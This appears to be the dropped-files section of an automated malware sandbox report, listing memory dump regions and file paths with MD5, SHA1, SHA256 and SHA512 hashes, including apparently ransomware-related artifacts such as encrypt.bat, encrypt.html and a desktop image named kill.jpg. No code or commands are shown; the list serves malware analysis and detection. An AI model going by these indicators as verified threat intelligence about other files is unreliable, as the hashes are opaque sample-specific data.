SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4616-214-0x00007FF9E5D00000-0x00007FF9E66EC000-memory.dmp

memory/4616-238-0x00007FF9E5D00000-0x00007FF9E66EC000-memory.dmp

memory/4616-239-0x00007FF9E5D00000-0x00007FF9E66EC000-memory.dmp

memory/4636-242-0x000001AC02240000-0x000001AC02250000-memory.dmp

memory/4636-258-0x000001AC02340000-0x000001AC02350000-memory.dmp

memory/4636-277-0x000001AC065A0000-0x000001AC065A2000-memory.dmp

C:\Encrypt\encrypt.html

MD5 60722a327960e4b4f5d967101a72ed06
SHA1 04109aaa12c19c7cb4c062b34d4ab4bfe4f52c5e
SHA256 3441d2b980fc2b4504c2308e6ec5da713c6bb0afd0ca9c846eec198cd1e2edfd
SHA512 98812a8546200353ae3c81733963082cbc6f2041b21d3897a5f26b63fbb0b730d81ab438286bdbdaef9eac8bfe3fe81fddabef2c0fd5f000a4279828bfdad896

C:\Encrypt\encrypt.bat

MD5 7a2773f461b2f4672ceb202de1104e08
SHA1 cbcab3b011eddb0b5af6dcfee171511efc2bb9c3
SHA256 522df7962a78dcec153baa5039c7cc119a0893fa247483fa0cddaf600ef9f695
SHA512 df35de150f08cb8bba1910a6be86d7945cd44850b6e9e9ffd420643d1ad18b172325f9114aa0982ec9e148ba62b55b4d8c69236156c562a5a1c024fba0c3983b

memory/1528-298-0x0000023A03820000-0x0000023A03920000-memory.dmp

memory/1528-297-0x0000023A03820000-0x0000023A03920000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ad5cd538ca58cb28ede39c108acb5785
SHA1 1ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256 c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512 c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7349175b03f7b4dffe32e246915c0cbc
SHA1 5cfae23b43de8fd31513e007723cc33720204749
SHA256 6211da309c8c5ba1c6d3c0f97d734b1cb443d1a6d101fe6299a4cc2e87c8d944
SHA512 b43bb7c01323665c2e29b5d13ddbe4400d5bd96abceb66923be378281eeb1498d42af400c5bdc66258f6fb37eb710077b4a66107bbe223584248fbe142a8f2be

memory/796-315-0x00000220F11A0000-0x00000220F11A2000-memory.dmp

memory/796-320-0x00000220F1290000-0x00000220F1292000-memory.dmp

memory/796-322-0x00000220F12B0000-0x00000220F12B2000-memory.dmp

memory/796-318-0x00000220F11D0000-0x00000220F11D2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ae1dc62b6d0dbf25952cab139b50d7bd
SHA1 f303586a69666b8e8b73129ff3a5f9412ebe671e
SHA256 af2681b4fa5920044879b14f03afb7479a2166b548d9bc46c959dc836be99844
SHA512 3eda84e1d78d426ce01d5ca5c7233d2638fcbdbff0587367ef8dc64dd1748db6880e2cf8ede1d33f767d1dab78044d5cd2e82efcd2c6cf310a5dd766264f5578

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8d78da699a0c7348866b0cccbe8ff511
SHA1 616f5238b83162c6813f592c996cf6fee470d67f
SHA256 7b84b8c6b0cad136f87a35c402922a75b65ac2d4ade1ad9942564db2a99eea7f
SHA512 026d3bedac9783e2bae9b8560497440449799dea7ac40089d15d705da81afd8542d61d176d9a3e574c20c1413d07fa5c19a931399c15e11caed23813b0b9aa0d

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ef6427d74f16635742e3ea58083e4ce9
SHA1 644064369e4b7b5986cfcc5fc1bfe580c7eaba3f
SHA256 244ce4a9621c470ba48e57d40b42806cee6e3c8e365660a9f6ef8c5ced40ed7c
SHA512 1daafe401f77650abf15e2532f40ce1d53c9b3e2f06c07e8faa810978e27b282d224a6ec3035e5e8935914d880fa0eecdf087c9dd91cafffb3212ee32dbecbf7

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2796bf48dcca09b7a366a1dcb122f591
SHA1 fad2769eef5353938a1794ad37f2b1c8d2579c25
SHA256 388a1f5dadbde953d7a69a8fc83fea388f88039d174b23b608a8c0823a68b178
SHA512 d513e093fc98a296ff4126f306fd994cf37c9bcd1d987df6868f8b83f2e21f58d95d52e969f2a335871dc2aefc5c786472fe0cdbf41581c7b2b8530dea32aee2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5e58ad9fcb6eaae64d0654c5e66ed84e
SHA1 dac911b338b61bc63760414d4c86458d21c59907
SHA256 3c94cbb4dbeb9c3a7f4c57a4df6da54f405473dde03df89e209093b19f26f3b1
SHA512 85ad449daf931a11c0bd60c0498ea28c6d826e20dbbce982aacea0df28481f7bc0781ea7e3cbca0e73c3e4e5901d9b7325876b10fb8ef036600338ccaee9b4dc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6a63408d14f8d9652c4d1a63fb3edaa2
SHA1 df60e8fae3472809c9308a61089a1433fe4c8cbd
SHA256 669b7cf2e993681c62730dc8ab021ad34f17bcb0b8276d34a4d71345fe91b2c2
SHA512 f4a59819b42518301bab8ab5f7c250d4db38ab9f9456eebbbea542f9c72f4ebc47f2822275b0df94631c126ec9d5815b95ce098d3c2e68e6c1b21b1d1a628bef

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0e0cca6f07a9825613c1a0123287e758
SHA1 1fd85acbe4815ce16d19daee4ebf088489fb4d08
SHA256 941a2713995f64f3862f16e2797e0628f33db6936f4c1713b630056ca47052a8
SHA512 6db648bfb4e352fb20adb7a0062df4ce82f802f3b2a15b55764d094fb4b017cae9cbc76ae70064bb888923d0aa45b1047d7ed871e0ceb8a946753600d3bab8c9

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 34438ea410b626fd2625060cad91d006
SHA1 cf7ad1822c4ee2f4a03a98bf9855b765f26ca4da
SHA256 5ab64c333bd8590bc4cdd86a44a165ee098ec78181ace9d72ee9df449c831b8c
SHA512 61e6ecb68704d918b5268b65bc28a260fdd3202a26e9f60ef31649fb9419cdba880ac1b8c91db813552599c6d9c5a005af3468b84b87e6f8795de21a2216b8b7

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9d64d501a000048fe6799cd9ac406be9
SHA1 53193dd60a3270384aff127302908d2554384134
SHA256 7481e898b40708ada6ed30c11ad33d57e17a4ce86e5e2370085ecedeaeadd707
SHA512 9f3cbd16dd872b9f8d6a91d34d7f42f00d469d2c69bf8657c2e5f60d7a2283f6a3cdfa5e0e984504d164b9fce789395011ce7e04c58eca0e9b68c204c3fe3b61

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0f9cd21eac36eb22fdab32de969deb97
SHA1 3b9f35a66956ae8837b484caf9f9d1b2c7ffcbcd
SHA256 5a758094f2d3a4e3076ad599f9920d483921cf09f2cfd75b8e30738b57d7ea09
SHA512 b1d04707df24053a1ffb98d4123bce98766963169d3772bb329e4013d9c9b8f1d6e31f1a14fd87ca3610ca789534c3035ec5c2bf098012c09b938168504ce172

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9008a64001ffeff15ce7579cb5e58188
SHA1 d0aaf0ef5f6e160ac568ef4d343896c5ec2471b2
SHA256 deee88435368b4dfc0c38f4800dfee44b98378d3f70080416791372b1681e2c9
SHA512 51a2c204f6051b926e963675e18851d0481b37082504dade63159d817670f30e6152871d162116b898d7d54135959c8edcc9b20ddc5ac7f19d2a2e93b852840e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 888f4ec955f6dd73c71f520d8f946017
SHA1 ced694258d0c7fd8d85b04c195ce22859e29af0d
SHA256 eaf0ab84a08cd2ba708759f1fe41ea9467befbadb25f044a186db008bbb78110
SHA512 d01ab7c7ed811542bca2c9b35d981af0f105f17872820330e7184b66388fe2d94a6289ae3e478f4a60de7dc162c380de47aaa27f7b82a38992b409d5951ee19c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 27c75ce8e1dd0a8d3166c4d7974fa078
SHA1 52620166b47e7e66d1bd77cb4722966fa1f04962
SHA256 9a0198a54040fa7377ec3ce42f4fcb6b4d1755164343c3b1bf217a720dbfe79e
SHA512 20f5684fd1c3e7bc50fb82236c4acca84b5612efbac1d897f456785bf6b1b2e4aedadf17bbb4bef6dd2af7d13dc15a5d006aeb21ea4247d6c264856db1b6ed60

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a338e1fd9c622ddfb5a7db9db921c4f7
SHA1 edb91a28e23b86dd63aabbccab7d2d663db01972
SHA256 28599a2484c7f9e4c45f5f19337da849d10b728f37717b2e090630a8265a22f7
SHA512 b9576e3f0d57d0cde8ae286b5cb23e80563f53a4fad3854843e7d9351db3fd1bdac3589c87dcbcfd3b3d76d79f494244fddd34a74a833a52da126cf25a435e2b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1d22ff4b8af570818529abb507ae61d1
SHA1 37a027a0a8165691dc2af643e6f54b5555f35b8e
SHA256 179d1e41016da568f5d0d0f974a5f4f611bdc93b59f3472d3c17b1b38413747b
SHA512 492f1cda1ca255bc4699f60173b01c36101b8a0be5dd8beee24b0ddd1521a038ebe71924a861d1653b2344124ce86a39d9b7184856009ed6d7a8041c6fd486f4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7fb8a6ae1a08e904c4bf0c47ab8814ae
SHA1 6030a774881da534be270bbfee4778f290d14fa7
SHA256 82390a1e50f09c71f31563201dd253e584106fe639be4e89c8a125e998b0edf7
SHA512 3972381838e733778251e32cc67e9cf758dc4d630761ab3d2dd1d6fd997cadf4284e745a68ea952104459f8f78fee1d452fc80afda64b1f5dbaa5b0e43488cad

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\Q7BUKSPQ\edgecompatviewlist[1].xml

MD5 d4fc49dc14f63895d997fa4940f24378
SHA1 3efb1437a7c5e46034147cbbc8db017c69d02c31
SHA256 853d2f4eb81c9fdcea2ee079f6faf98214b111b77cdf68709b38989d123890f1
SHA512 cc60d79b4afe5007634ac21dc4bc92081880be4c0d798a1735b63b27e936c02f399964f744dc73711987f01e8a1064b02a4867dd6cac27538e5fbe275cc61e0a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0648a1778be3a688ddfdc7ce413138ba
SHA1 e07e38b4ac7af1b589cc39c9e563a8a25a1830d3
SHA256 4f8ad8987762f761deacf05cd7caeb8d6a04a6cbb73ff66d6d2a33d6d2e2c578
SHA512 f3e59f34e745a77ab31fb227294636ec6a3d27a21a0b4b863cb9b4804f89a2717ce13ba32a6ec11744010e9a4e8a8b09cf16743823167a55488157b22c45f1f5

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cccdea27e371e720e3eb2f4d981e89f2
SHA1 3a498a0242d0b0b910140e27cccce65fbcd04d42
SHA256 a0169768dd782490558bc9591662e75864d9ce0093186aa37d44a48a257ebb45
SHA512 12f3af62274d1e8d99d575a6d3be6c9d74051e8a17fd60d3635470ca4de8ec697d7440d776317931d56985292d07dd605fc01e16d14c2ceca290a3cb827f2da0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7ef4e2edd4b7175d2d0c5ce3a853d5bd
SHA1 6ce63dab1dfbaecd3d55fff5ba0a14012811bd71
SHA256 4a6772292ad97cabfc8cba04dd30336a5c77ee196a288c6093a12ca3b9a575a0
SHA512 8cc4d04c37457218969e46bbc08a6c8b37667b8f98e22804e1fe554de94427730270550d0d1009af818dae836afe6cc88106bcbd7a353ae3544b58a40d13cad6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a2511542ae14a9d12f93cda64f51a713
SHA1 49fc36d8085b1a87db8bd766291c975b8903b359
SHA256 29a1f7ff523730f432b1cb2582cde6d683e0d7c9cccaa59f5d4b57c224c3a181
SHA512 541caa6f6495f8d3b4e766dcb08a0aeae1966444c910e0912d0581685643b9ae9e986c1a55871e04fabe3ad75ffaddf45103bc94231bfe9b2ffe24adab50973d

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5325bcc5859819b6dd0c7ea3f65d1531
SHA1 00d75bb331ee69fb152059bfa80feeb281446a60
SHA256 ec1eb5d62a3d3acea7a70a5811517e8fe2bfb8160d2fc6abe4eb48d4289102b9
SHA512 e9d61174840c14fbe517f32aa1bfe763e6e6205db64e16e633ec45bae5fe0fc979759ec3f8473d7b9994a8fbc02f80981930917fc3c424032a97d6a879c3ade8

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3eba7760ed4775664f664da98f29b4f0
SHA1 6b1e848b6d5b89b2bdda16ccf4382e28ea7679ff
SHA256 87ab3b350a5da6e1441e16a3de88b3d1eb7165cd87e6bf237ec78841e46c917a
SHA512 cc54bde3f5a46e021fed2390e436d726b9a8743c36316cb55bba6a22d6957bd96b19ae871df7f60a768790b57da20ef2e7f764ed6614963448167ee5dce59c85

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1449295cfd039bc3e1a8947ade2fc174
SHA1 b2ee665df758dc9af660d6ebafba1831e1581ed3
SHA256 c093bf7eb0045e7c6dda574725aa8885a605c86dd075ce9d94c93f134327f776
SHA512 75f49d501052e7b5386c40f5293ed2ddfd7a8a0bd3abde195308d7711fea97968dcf2c13336841ae67b44a7205649e48991cef8ec80f385f2383fcb3d68bcbad

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7bc36834b9ac52abc5c95ffa952b1c49
SHA1 c4cb1c1b2fa12499bcc078ebca5a9f6e1c5c8cdf
SHA256 d5a4fa9b42c9b5874c496feb99bcef9ad6853cdd89a676dfd21becec69395a72
SHA512 b2afccebb72daa1f8783b8860d61aa7344822eae0e6ca837b71d4f6b61d2b828e066902340fa81a9d44cf19dabfa8eefb4eb870ecc2e9a32fcf4f31d6d19d7dc

C:\Users\Admin\Desktop\kill.jpg

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8f3691d4e4311bb9a25b98a31a4af3ea
SHA1 d4a18d7b3f3b613839e903cae1446eef1d1cca8c
SHA256 dbb662a2c8d82f0cd1068d0fb75d3788b79066f049c5bfe63d46b0f11e5c3efc
SHA512 e612712ee4aa8f29fa9e052e01f130c12b3d7a243674f7c2e5837d9a6710ba5be355d55211560bda4838d8712aa4188f0de207768c5a953b9f5ede3cb320384d

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3ea75298634899c0575b7a9296f0566d
SHA1 e26cd5540a38661636034f70a5579f27b9332672
SHA256 41538f75a9ce8c1e8a2602227d59957818e748945b7f123fc4297505e23cf69e
SHA512 873885fa963d54ac71b9718a4638ebf0e21f5b3e3700715a368ed8a909a053883cd4f5c7237af0534d81b74de6e7f3fa5127c98236d0314e548e70d3612f4d21

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 221ea62a3483545edfd6c95836d213b2
SHA1 c3f3c5333723cfe7943c7b25a9c4ace10fc12837
SHA256 404ed9e7ec4e647f77f287c154a4cf1f832221d4a32ed234abfe5a6f639faacb
SHA512 e3f9c90825479b98aae1e90a781b47563eed4a0d50c2134f6be91716bc933e06197372a1d15b60993b06eb0ff81e4dcb22690c1363474772c63ef3471b119e77

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 558f8f63df3e0e60a901729df3744a1f
SHA1 9ce05f615f1555f0d74a4f53d4241a1a8cb748b6
SHA256 f41783acc666fc9ca785a2fdefa56e71d886cacb3ab57e4708a87d41c4d69804
SHA512 6d1b431c6fd1be7f0eec2b81a86b9ff65bfa1040ef05e64a86ef0e04cd6458d7305dba20c80a43e4b02131db592f57f45fc1439c9783aa42f1d63117e656170e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 74bef0d68b005c46184b581a43dd1928
SHA1 7711ba3804b7fcfe0ded3b6aebffd16672690344
SHA256 20b254c404421017f1c2e61b4bcd8f8561bb324170f95ce9431159abd79cab65
SHA512 5f05e90ab44624203b727d1238ea739293e95dd3dc438542d9d414bf03c97e824a3631e9ed717c2ffacc6f6aa968785fd0d4e820acf0d240009da77a9e869722

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a34142a0a75ce7f697ccbe8d76b49b1a
SHA1 cf3de9271fdb8215e7fd11b052107fe95c12c2e5
SHA256 41d0083611fdfefe3d2576fc1018bd23826955fe9a7211f842f7a9022085b4e2
SHA512 c64c5618fcce50cd2b620376e3b4784a84b467c3de7ebf73b2fd88ecb9f9cc81073182c9a78384db9dc0218434d0b08f6ee6e81359898db2964304eebaa6b39d

memory/4636-2069-0x000001AC09500000-0x000001AC09501000-memory.dmp

memory/4636-2070-0x000001AC09510000-0x000001AC09511000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\JBA04VHG\suggestions[1].en-US

MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

C:\Users\Admin\Desktop\kill.jpg

MD5 7bf5bd0f71f60740d095194bc7f08f67
SHA1 62e1c323ebf90364738c8211a82caf7829c45a0b
SHA256 ec63c816c28384abe6d654aed05d4f6092df0fbcd57073427e2ef96a1ba18601
SHA512 19d8e67f15b2fc99dd8f3ffe45898182910df80daec8f1324ed5847b0e4005c868d29e1b5ba5d77106aa4cc559a0a1278030f8f8fe29412c7985bc35f4aa5a65